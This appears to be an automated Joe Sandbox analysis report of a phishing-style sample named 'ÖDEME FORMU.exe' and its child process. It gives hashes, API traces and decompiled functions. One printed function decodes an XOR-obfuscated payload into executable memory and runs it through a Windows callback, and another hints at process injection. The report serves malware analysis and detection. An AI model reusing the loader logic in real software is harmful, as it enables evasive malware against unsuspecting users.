Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 502464d238130af793e5dd4416e0b03d6a5de7fe60fe2b59f7980452aa14ff43
Instruction ID: 29fcd441dffe1e7b6305a3cd4593f976d2a152948ddea41a7ee803b159643aa2
Opcode Fuzzy Hash: 502464d238130af793e5dd4416e0b03d6a5de7fe60fe2b59f7980452aa14ff43
Instruction Fuzzy Hash: B1113071600218BBDF219F91EC40A9B3769BF84765F00813AFA08691A2C7B94D91DFED

Uniqueness

Uniqueness Score: -1.00%

Function 00402521 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402521(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A85(0x11));
				} else {
					E00402A68(1);
					 *0x4097f8 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405A6B(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x00402521
0x00402521
0x00402524
0x0040253f
0x00402526
0x00402528
0x0040252d
0x00402534
0x00402546
0x004026bf
0x004026bf
0x0040254c
0x0040255e
0x004015ae
0x004015b0
0x00000000
0x004015b6
0x004015b0
0x0040291d
0x00402929

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 0040253F
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp,00000000,?,?,00000000,00000011), ref: 0040255E

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040252D, 00402552

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 427699356-501415292
Opcode ID: 43c287db0b9488ba1958c90e0c04839735a403a3c50cc02975388901bfa035a1
Instruction ID: f3470f1ba8555a22246df6218562ebca8c23e151121f121bd8a2f796b88427a7
Opcode Fuzzy Hash: 43c287db0b9488ba1958c90e0c04839735a403a3c50cc02975388901bfa035a1
Instruction Fuzzy Hash: 97F0BE72A44241BED710EFA09E99AEF76A8CB00309F10043BB142F60C2D6FC4B419B2E

Uniqueness

Uniqueness Score: -1.00%

Function 0040562E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040562E(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x0040562f
0x00405639
0x0040563b
0x00405642
0x0040564a
0x00000000
0x00000000
0x00000000
0x0040564a
0x0040564c
0x00405651

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CEA,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U00d6DEME FORMU.exe,C:\Users\user\Desktop\#U00d6DEME FORMU.exe,80000000,00000003), ref: 00405634
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CEA,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U00d6DEME FORMU.exe,C:\Users\user\Desktop\#U00d6DEME FORMU.exe,80000000,00000003), ref: 00405642

Strings

C:\Users\user\Desktop, xrefs: 0040562E

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1669384263
Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
Instruction ID: 55d490dd391442433e5efd6983ceb3f41bba8d4964d1e45b55f62cb9bfffce1e
Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
Instruction Fuzzy Hash: EBD0C7A2409EB05EF30362149C04B9F7A58DF16711F494862F544A62A1C2785C428FAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405740 Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405740(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x0040574c
0x0040574e
0x00405776
0x0040575b
0x00405760
0x0040576b
0x00000000
0x00405788
0x00405774
0x00405774
0x00000000

APIs

lstrlenA.KERNEL32(?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405747
lstrcmpiA.KERNEL32(?,?,?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405760
CharNextA.USER32(?), ref: 0040576E
lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405777

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e32237a626722e8137879666343952be07cc79a6fe12a37d3b79e97bd5271ec
Instruction ID: aca38312d8f432cd573fb0c64364face36d8f92203a8fe78b636acf1828773cc
Opcode Fuzzy Hash: 2e32237a626722e8137879666343952be07cc79a6fe12a37d3b79e97bd5271ec
Instruction Fuzzy Hash: 52F0A736249D51DAC2129B255C44D6B7A94EF91355F14057AF440F3180D335A815ABBB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: erltu.exePID: 6336, Parent PID: 6304COMMON

Executed Functions

Function 007F11F5 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 007F1339
GetThreadContext.KERNELBASE(?,00010007), ref: 007F135C

Strings

D, xrefs: 007F12C2

Memory Dump Source

Source File: 00000001.00000002.280671670.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_erltu.jbxd

Similarity

API ID: ContextCreateProcessThread
String ID: D
API String ID: 2843130473-2746444292
Opcode ID: 9120dd1152eeacbdd18549d3c74641e9971df411b9c8c2fb541c424416b383eb
Instruction ID: d9ec35bdeaec6d7d20f412a24a02edb09e5399a864e43a8f9d0edcd7f39cfa11
Opcode Fuzzy Hash: 9120dd1152eeacbdd18549d3c74641e9971df411b9c8c2fb541c424416b383eb
Instruction Fuzzy Hash: EEA1D170E0024DEFDB40DBA4C985BBEBBB5BF48305F6044A9E615EB391D738AA41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 007F0809 Relevance: 7.7, APIs: 5, Instructions: 182
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 007F09A7

Memory Dump Source

Source File: 00000001.00000002.280671670.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_erltu.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 617e84d07a39827d96e852159aad1928f67093c1b2a07b0d1ae1f35af64c87fa
Instruction ID: 6231385e6773e3b6827219e703253461bb542df72e45a6c39f1d546eae5632e4
Opcode Fuzzy Hash: 617e84d07a39827d96e852159aad1928f67093c1b2a07b0d1ae1f35af64c87fa
Instruction Fuzzy Hash: 6E615635E5034CEADF50DBE4E816BBDB7B5AF88710F20841AE218FA3A1E7741A41DB45

Uniqueness

Uniqueness Score: -1.00%

Function 0101E410 Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E0101E410(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E0101E690(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = 0;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							} else {
								L14:
								_t117 = _a12 * _t97;
								__eflags =  *(_t119 + 0xc) & 0x0000010c;
								_t98 = _t117;
								if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
									_t100 = 0x1000;
								} else {
									_t100 =  *(_t119 + 0x18);
								}
								_v16 = _t100;
								__eflags = _t117;
								if(_t117 == 0) {
									L42:
									return _a16;
								} else {
									do {
										__eflags =  *(_t119 + 0xc) & 0x0000010c;
										if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
											L25:
											__eflags = _t98 - _t100;
											if(_t98 < _t100) {
												_t81 = E0101F342(_t98, _t119, _t119); // executed
												__eflags = _t81 - 0xffffffff;
												if(_t81 == 0xffffffff) {
													L47:
													return (_t117 - _t98) / _a12;
												}
												_t102 = _v12;
												__eflags = _t102;
												if(_t102 == 0) {
													L43:
													__eflags = _a8 - 0xffffffff;
													if(_a8 != 0xffffffff) {
														E0101E690(_a4, 0, _a8);
													}
													 *((intOrPtr*)(E0101EF9A())) = 0x22;
													L4:
													E0101E9FE();
													goto L5;
												}
												_t110 = _v8;
												 *_t110 = _t81;
												_t98 = _t98 - 1;
												_v8 = _t110 + 1;
												_t103 = _t102 - 1;
												__eflags = _t103;
												_v12 = _t103;
												_t100 =  *(_t119 + 0x18);
												_v16 = _t100;
												goto L41;
											}
											__eflags = _t100;
											if(_t100 == 0) {
												_t86 = 0x7fffffff;
												__eflags = _t98 - 0x7fffffff;
												if(_t98 <= 0x7fffffff) {
													_t86 = _t98;
												}
											} else {
												__eflags = _t98 - 0x7fffffff;
												if(_t98 <= 0x7fffffff) {
													_t44 = _t98 % _t100;
													__eflags = _t44;
													_t113 = _t44;
													_t91 = _t98;
												} else {
													_t113 = 0x7fffffff % _t100;
													_t91 = 0x7fffffff;
												}
												_t86 = _t91 - _t113;
											}
											__eflags = _t86 - _v12;
											if(_t86 > _v12) {
												goto L43;
											} else {
												_push(_t86);
												_push(_v8);
												_push(E0101F463(_t119)); // executed
												_t88 = E0101F61A(); // executed
												_t120 = _t120 + 0xc;
												__eflags = _t88;
												if(_t88 == 0) {
													 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
													goto L47;
												}
												__eflags = _t88 - 0xffffffff;
												if(_t88 == 0xffffffff) {
													L46:
													_t64 = _t119 + 0xc;
													 *_t64 =  *(_t119 + 0xc) | 0x00000020;
													__eflags =  *_t64;
													goto L47;
												}
												_t98 = _t98 - _t88;
												__eflags = _t98;
												L37:
												_v8 = _v8 + _t88;
												_v12 = _v12 - _t88;
												_t100 = _v16;
												goto L41;
											}
										}
										_t94 =  *(_t119 + 4);
										_v20 = _t94;
										__eflags = _t94;
										if(__eflags == 0) {
											goto L25;
										}
										if(__eflags < 0) {
											goto L46;
										}
										__eflags = _t98 - _t94;
										if(_t98 < _t94) {
											_t94 = _t98;
											_v20 = _t98;
										}
										_t104 = _v12;
										__eflags = _t94 - _t104;
										if(_t94 > _t104) {
											goto L43;
										} else {
											E0101F487(_v8, _t104,  *_t119, _t94);
											_t88 = _v20;
											_t120 = _t120 + 0x10;
											 *(_t119 + 4) =  *(_t119 + 4) - _t88;
											_t98 = _t98 - _t88;
											 *_t119 =  *_t119 + _t88;
											goto L37;
										}
										L41:
										__eflags = _t98;
									} while (_t98 != 0);
									goto L42;
								}
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L14;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E0101EF9A())) = 0x16;
				goto L4;
			}

0x0101e41a
0x0101e41d
0x0101e423
0x0101e426
0x0101e429
0x0101e446
0x00000000
0x0101e446
0x0101e42b
0x0101e430
0x00000000
0x00000000
0x0101e434
0x0101e44f
0x0101e452
0x0101e454
0x0101e462
0x0101e462
0x0101e466
0x0101e46e
0x0101e473
0x0101e473
0x0101e476
0x0101e478
0x00000000
0x0101e47a
0x0101e47a
0x0101e47d
0x0101e482
0x0101e484
0x00000000
0x0101e486
0x0101e486
0x0101e489
0x0101e48c
0x0101e493
0x0101e495
0x0101e49c
0x0101e497
0x0101e497
0x0101e497
0x0101e4a1
0x0101e4a4
0x0101e4a6
0x0101e58f
0x00000000
0x0101e4ac
0x0101e4ac
0x0101e4ac
0x0101e4b3
0x0101e4f4
0x0101e4f4
0x0101e4f6
0x0101e561
0x0101e567
0x0101e56a
0x0101e5c1
0x00000000
0x0101e5c7
0x0101e56c
0x0101e56f
0x0101e571
0x0101e597
0x0101e597
0x0101e59b
0x0101e5a5
0x0101e5aa
0x0101e5b2
0x0101e441
0x0101e441
0x00000000
0x0101e441
0x0101e573
0x0101e576
0x0101e579
0x0101e57a
0x0101e57d
0x0101e57d
0x0101e57e
0x0101e581
0x0101e584
0x00000000
0x0101e584
0x0101e4f8
0x0101e4fa
0x0101e51e
0x0101e523
0x0101e529
0x0101e52b
0x0101e52b
0x0101e4fc
0x0101e4fe
0x0101e504
0x0101e516
0x0101e516
0x0101e516
0x0101e518
0x0101e506
0x0101e50b
0x0101e50d
0x0101e50d
0x0101e51a
0x0101e51a
0x0101e52d
0x0101e530
0x00000000
0x0101e532
0x0101e532
0x0101e533
0x0101e53d
0x0101e53e
0x0101e543
0x0101e546
0x0101e548
0x0101e5cf
0x00000000
0x0101e5cf
0x0101e54e
0x0101e551
0x0101e5bd
0x0101e5bd
0x0101e5bd
0x0101e5bd
0x00000000
0x0101e5bd
0x0101e553
0x0101e553
0x0101e555
0x0101e555
0x0101e558
0x0101e55b
0x00000000
0x0101e55b
0x0101e530
0x0101e4b5
0x0101e4b8
0x0101e4bb
0x0101e4bd
0x00000000
0x00000000
0x0101e4bf
0x00000000
0x00000000
0x0101e4c5
0x0101e4c7
0x0101e4c9
0x0101e4cb
0x0101e4cb
0x0101e4ce
0x0101e4d1
0x0101e4d3
0x00000000
0x0101e4d9
0x0101e4e0
0x0101e4e5
0x0101e4e8
0x0101e4eb
0x0101e4ee
0x0101e4f0
0x00000000
0x0101e4f0
0x0101e587
0x0101e587
0x0101e587
0x00000000
0x0101e4ac
0x0101e4a6
0x0101e484
0x0101e478
0x0101e45b
0x0101e45e
0x0101e460
0x00000000
0x00000000
0x00000000
0x0101e460
0x0101e436
0x0101e43b
0x00000000

APIs

_memset.LIBCMT ref: 0101E46E
_memcpy_s.LIBCMT ref: 0101E4E0
__read_nolock.LIBCMT ref: 0101E53E
__filbuf.LIBCMT ref: 0101E561
_memset.LIBCMT ref: 0101E5A5

Part of subcall function 0101EF9A: __getptd_noexit.LIBCMT ref: 0101EF9A

Memory Dump Source

Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 89461c8fd91a486137e4c71f56b3b0b7c112c4aab7dea18a24846f5bb2654788
Instruction ID: d8933e0f740f9e9eef45c06881cb8ff019d2423fef86391048ca7238340a059a
Opcode Fuzzy Hash: 89461c8fd91a486137e4c71f56b3b0b7c112c4aab7dea18a24846f5bb2654788
Instruction Fuzzy Hash: C651C970A003069BDB668F6DC8806AD7BF5AF44330F148769FDA5872D8FB7899508B41

Uniqueness

Uniqueness Score: -1.00%

Function 01011000 Relevance: 7.6, APIs: 5, Instructions: 93
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E01011000(void* __edx, intOrPtr _a12) {
				void* _t4;
				void* _t5;
				_Unknown_base(*)()* _t8;
				signed int _t17;
				signed int _t20;
				signed int _t23;
				void* _t25;
				signed int _t35;
				signed int _t36;
				signed int _t38;
				void* _t43;
				void* _t44;
				_Unknown_base(*)()* _t51;
				void* _t53;

				_t43 = __edx;
				_t53 = 0; // executed
				_t4 = E0101E331(_a12, 0x1030000); // executed
				_t25 = _t4;
				_t5 = VirtualAlloc(0, 0x1ad27480, 0x3000, 4); // executed
				if(_t5 == 0) {
					return 0;
				} else {
					E0101E690(_t5, 0x99, 0x1ad27480);
					_t8 = VirtualAlloc(0, 0x14be, 0x3000, 0x40); // executed
					_t51 = _t8;
					E0101E5D5(_t51, 0x14be, 1, _t25); // executed
					do {
						 *(_t51 + _t53) = (( *(_t51 + _t53) + 0x00000050 ^ 0x000000a5) + 0x0000006c ^ 0x000000f4) + 0x00000033 ^ 0x000000d0;
						_t53 = _t53 + 1;
					} while (_t53 < 0x14be);
					_t17 = EnumSystemCodePagesA(_t51, 0); // executed
					if(_t17 == 0xe12f) {
						_t44 = _t43 + 0xdb0e;
						_pop(_t35);
						_t36 =  !_t35;
						if(( !_t17 ^ 0x0000cd45) != 0x6082) {
							_t36 = 0xbc6b;
							_t44 = _t44 - 1;
						}
						_pop(_t20);
						_t23 = (_t20 & 0x000161dd) - 0xfffffffffffec5f9;
						_t38 =  !(_t36 - 0xb1b2);
						if(_t23 != 0xb7d3) {
							_t23 = _t23 & 0x00010f24;
							_t38 = _t38 + 0x158ad;
						}
						return _t23;
					} else {
						return _t17;
					}
				}
			}

0x01011000
0x0101100e
0x01011010
0x0101101b
0x0101102c
0x01011030
0x0101e280
0x01011036
0x01011041
0x01011056
0x01011060
0x01011064
0x0101106c
0x0101107b
0x0101107e
0x0101107f
0x01011086
0x01011091
0x010110b1
0x010110b7
0x010110b8
0x010110c4
0x010110c7
0x010110cc
0x010110cc
0x010110cd
0x010110d4
0x010110df
0x010110ec
0x010110ef
0x010110fa
0x01011100
0x01011110
0x01011093
0x010110a1
0x010110a1
0x01011091

APIs

Part of subcall function 0101E331: __wfsopen.LIBCMT ref: 0101E33C

VirtualAlloc.KERNELBASE(00000000,1AD27480,00003000,00000004), ref: 0101102C
_memset.LIBCMT ref: 01011041
VirtualAlloc.KERNELBASE(00000000,000014BE,00003000,00000040), ref: 01011056
__fread_nolock.LIBCMT ref: 01011064
EnumSystemCodePagesA.KERNEL32(00000000,00000000), ref: 01011086

Memory Dump Source

Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: AllocVirtual$CodeEnumPagesSystem__fread_nolock__wfsopen_memset
String ID:
API String ID: 3752165176-0
Opcode ID: c26b17e1dbc339fad4bb5ed03add81d65187d920f56cf9e146a4e1ad3314ddca
Instruction ID: a1a06a2b305d83f635797b3891486e3e14c92c3293427a791ddec07f7c9a1faf
Opcode Fuzzy Hash: c26b17e1dbc339fad4bb5ed03add81d65187d920f56cf9e146a4e1ad3314ddca
Instruction Fuzzy Hash: 4C21BB77A506003BF3391038EC82FEF2F58D790318F180139FB809A1C5DAADA58241A8

Uniqueness

Uniqueness Score: -1.00%

Function 0101695C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E0101695C(signed int __ebx, void* __ecx, intOrPtr __edi, void* __eflags) {
				void* __esi;
				void* _t11;
				void* _t12;
				signed int _t13;
				signed int _t14;
				intOrPtr* _t17;
				void* _t18;
				void* _t21;
				signed int _t22;
				void* _t25;
				intOrPtr _t28;
				intOrPtr* _t30;
				signed int _t32;
				void* _t33;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t40;

				_t40 = __eflags;
				_t28 = __edi;
				_t25 = __ecx;
				_t22 = __ebx;
				while(1) {
					_push(es);
					if(_t40 != 0) {
						break;
					}
					_t30 = _t30 + 2;
					__eflags =  *_t30 - _t11;
				}
				_t12 = E010223AA(_t22, _t25, _t30, _t30, L"UTF-8", 5);
				_t36 = _t35 + 0xc;
				if(_t12 != 0) {
					_t13 = E010223AA(_t22, _t25, _t30, _t30, L"UTF-16LE", 8);
					_t37 = _t36 + 0xc;
					__eflags = _t13;
					if(_t13 != 0) {
						_t14 = E010223AA(_t22, _t25, _t30, _t30, L"UNICODE", 7);
						_t37 = _t37 + 0xc;
						__eflags = _t14;
						if(_t14 != 0) {
							goto L1;
						} else {
							_t32 = _t30 + 0xe;
							_t24 = _t22 | 0x00010000;
							__eflags = _t22 | 0x00010000;
							goto L11;
						}
					} else {
						_t32 = _t30 + 0x10;
						_t24 = _t22 | 0x00020000;
						goto L11;
					}
				} else {
					_t32 = _t30 + 0xa;
					_t24 = _t22 | 0x00040000;
					L11:
					_t18 = 0x20;
					while( *_t32 == _t18) {
						_t32 = _t32 + 2;
						__eflags = _t32;
					}
					if( *_t32 != 0) {
						L1:
						 *((intOrPtr*)(E0101EF9A())) = 0x16;
						E0101E9FE();
						goto L2;
					} else {
						_t21 = E010222CE(_t33 + 0xc,  *((intOrPtr*)(_t33 + 8)), _t24,  *((intOrPtr*)(_t33 + 0x10)), 0x180); // executed
						if(_t21 != 0) {
							L2:
							_t17 = 0;
						} else {
							_t17 =  *((intOrPtr*)(_t33 + 0x14));
							 *0x10311cc =  *0x10311cc + 1;
							 *((intOrPtr*)(_t17 + 4)) = 0;
							 *_t17 = 0;
							 *((intOrPtr*)(_t17 + 8)) = 0;
							 *((intOrPtr*)(_t17 + 0x1c)) = 0;
							 *((intOrPtr*)(_t17 + 0xc)) = _t28;
							 *((intOrPtr*)(_t17 + 0x10)) =  *((intOrPtr*)(_t33 + 0xc));
						}
					}
				}
				return _t17;
			}

0x0101695c
0x0101695c
0x0101695c
0x0101695c
0x0101eea6
0x0101eea6
0x0101eea7
0x00000000
0x00000000
0x0101eea1
0x0101eea4
0x0101eea4
0x0101eeb1
0x0101eeb6
0x0101eebb
0x0101eed0
0x0101eed5
0x0101eed8
0x0101eeda
0x0101eeef
0x0101eef4
0x0101eef7
0x0101eef9
0x00000000
0x0101eeff
0x0101eeff
0x0101ef02
0x0101ef02
0x00000000
0x0101ef02
0x0101eedc
0x0101eedc
0x0101eedf
0x00000000
0x0101eedf
0x0101eebd
0x0101eebd
0x0101eec0
0x0101ef08
0x0101ef0a
0x0101ef10
0x0101ef0d
0x0101ef0d
0x0101ef0d
0x0101ef1a
0x0101ed02
0x0101ed07
0x0101ed0d
0x00000000
0x0101ef20
0x0101ef30
0x0101ef3a
0x0101ed12
0x0101ed12
0x0101ef40
0x0101ef40
0x0101ef43
0x0101ef4b
0x0101ef4e
0x0101ef50
0x0101ef53
0x0101ef59
0x0101ef5c
0x0101ef5c
0x0101ef3a
0x0101ef1a
0x0101ef65

APIs

__wcsnicmp.LIBCMT ref: 0101EEB1
__sopen_s.LIBCMT ref: 0101EF30

Strings

UTF-8, xrefs: 0101EEAB

Memory Dump Source

Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: __sopen_s__wcsnicmp
String ID: UTF-8
API String ID: 678683046-243350608
Opcode ID: 53fedec632b34256b38741706f5063a25bcc4bbfd43fb6985045649a821e02b8
Instruction ID: 22169bac373c15eaf3e2cda7c59c5594907577eb8fed18e5f5f713e7c2087069
